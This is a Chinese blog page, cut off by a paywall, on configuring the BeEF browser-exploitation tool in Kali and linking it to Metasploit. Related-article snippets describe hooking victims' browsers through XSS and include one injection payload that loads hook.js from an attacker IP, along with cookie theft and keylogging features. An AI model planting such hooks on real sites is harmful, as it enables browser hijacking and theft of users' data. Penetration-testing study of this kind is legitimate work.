xss利用之kali神器beef

最新推荐文章于 2024-05-16 23:23:06 发布
最新推荐文章于 2024-05-16 23:23:06 发布
阅读量3.2w 收藏 28
点赞数 2
分类专栏: 科研项目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiangliuzheng/article/details/51910687
版权

1、beef基本配置

BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf

1、修改config.yaml

编辑
/usr/share/beef-xss/config.yaml

metasploit:
            enable: false改为true

这里写图片描述

编辑
/usr/share/beef-xss/extensions/demos/config.yaml

enable:true改为false

编辑
/usr/share/beef-xss/extensions/metasploit/config.yaml

设置
    ssl: true
    ssl_version: 'TLSv1'

这里写图片描述

2、启动msf服务

service postgresql start
service metasploit start
msfconsole
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc1
最低0.47元/天 解锁文章
天空里的飞鸟
关注
  • 2
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
beef-xss安装与使用
Bu2n的博客
12-07 3321
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
kali安装beef
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-29 7257
kali安装beef 本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.csdn.net/weixin_43847838/article/details/110312851。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
kalibeef的使用_kali没有beef(1)
最新发布
2401_82645688的博客
05-16 1034
BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。beef也是属于c/s结构,具体看图zombie(僵尸)即受害的浏览器。
kali工具之Beef
wulanlin的博客
12-27 542
*本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.间人 社会工程: 1
KaliBeef的使用教程
weixin_43287317的博客
04-02 5258
KaliBeef的使用教程
xss防御之php利用httponly防xss攻击
12-19
这样就减少了攻击者利用XSS窃取用户身份信息、管理员凭证等敏感数据的风险。 在PHP,有多种方式可以设置HTTPOnly Cookie: 1. **全局开启**:在`php.ini`配置文件,可以设置`session.cookie_httponly = 1`来...
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序最常见的漏洞。指攻击者在网页嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
Kali [BeEF-XSS]XSS利用工具
weixin_45253622的博客
03-29 4337
BeEF-XSS的使用 BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 安装 linux安装 apt-get update apt-get install beef-xss 启动Apache并打开beef service apache2 start beef-xss #打开 打开beef需要设置密码,默认密码和用户名都为beef 第二个框是示例payloa
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1716
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
kali beef的使用
pigzlfa的博客
07-05 417
beef的安装 可以直接安装也可以从源码安装,略 beef安装好后,打开web登陆页面 http://192.168.102.130:3000/ui/panel url为kali机地址,可以从配置文件修改 3.把js加载进存在xss的地方(例pikachu) payload: <script src='http://192.168.102.130:3000/hook.js'></script> 可以看到在不停的向102.130发起请求 使用beef终端发送弹窗 .
kalibeef的使用
热门推荐
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali下使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
Web安全 XSS漏洞的利用Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4064
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
牛B装备 XSS 漏洞利用工具[使用教程]
weixin_30412577的博客
02-14 250
牛B装备 XSS 漏洞利用工具[使用教程] 牛B装备 XSS 漏洞利用工具[使用教程] 作者:佚名 来源:本站整理 发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr工具下载地址:http://www.7747.net/Soft/200912/16400.html图片: 在工具,最让人头疼的就是盗取cookie这个版面.绝对有许多人...
【2024版】最新推荐好用的XSS漏洞扫描利用工具
Libra1313的博客
01-25 2113
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
toxssin:一款功能强大的XSS漏洞扫描利用和Payload生成工具
顶峰
02-15 1389
toxssin支持拦截下列内容:cookie键盘击键数据粘贴事件输入修改事件文件选择表单提交服务器响应表单数据toxssin还支持下列功能:1、尝试在用户浏览网站时通过拦截http请求和响应并重写文档来实现XSS持久化;2、支持会话管理,这意味着,您可以使用它来利用反射型和存储型XSS;3、支持针对会话的自定义JavaScript脚本执行;4、自动记录所有会话信息;
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页插入恶意脚本来获取用户的敏感信息。 BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux结合使用XSSBeEF可以实现对网站的全面安全检测和攻击。 “剑心哥哥”可能是指对网络安全有一定研究和实践经验的人,因为这些工具都需要一定的技术和知识才能使用。结合使用Kali Linux、XSSBeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人隐私。通过学习和实践网络安全相关知识,我们可以更好地保护自己的网络安全,并为网络安全事业做出贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值